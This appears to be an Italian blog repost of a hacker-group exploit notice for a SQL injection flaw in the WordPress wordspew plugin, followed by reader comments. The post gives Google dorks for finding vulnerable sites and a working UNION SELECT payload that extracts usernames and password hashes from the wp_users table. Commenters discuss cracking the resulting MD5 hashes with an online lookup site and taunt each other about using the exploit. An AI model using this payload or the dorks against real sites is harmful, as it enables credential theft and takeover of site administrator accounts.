WordPress Plugin (wordspew-rss.php) SQL Injection

#########################################################################
#
# WordPress Plugin (wordspew-rss.php) SQL Injection
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################

DORK 1 : allinurl: “wordspew-rss.php”

DORK 2 : allinurl: “wp-content/plugins/wordspew”

DORK 3 : allinurl: “wordspew/wordspew-rss.php”

#########################################################################
EXPLOIT :

wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user
_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c)
,4,5/**/FROM/**/wp_users

#########################################################################
# S@BUN http://www.hackturkiye.com S@BUN
#########################################################################
# S@BUN GOOD LUCKY S@BUN
#########################################################################

7 Risposte to “WordPress Plugin (wordspew-rss.php) SQL Injection”

  1. questa e un exploit scritta in perl ….in parole povere sfrutta il bug presente nel wordspew/wordspew-rss.php ……se il sito e bugato sfruttando questa exploit puoi risalire alla passw..del ADMIN in md5….ciao

  2. trinacriahackers Says:

    ma allora sei furbo…
    se io la uso su di te ?

  3. MMMMMMMMMMM……………NN FUNZIONA SU DI Mè – -“…

  4. #Frodohack# Says:

    mi sà che funziona su di te… cmq non è possibile scriptare password in md5 mi disp

  5. ah…non è possibile??? allora vai qui : http://md5.rednoize.com/ e poi dimmi se è impossibile

  6. no comment =_=

Lascia un commento

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...

%d blogger cliccano Mi Piace per questo: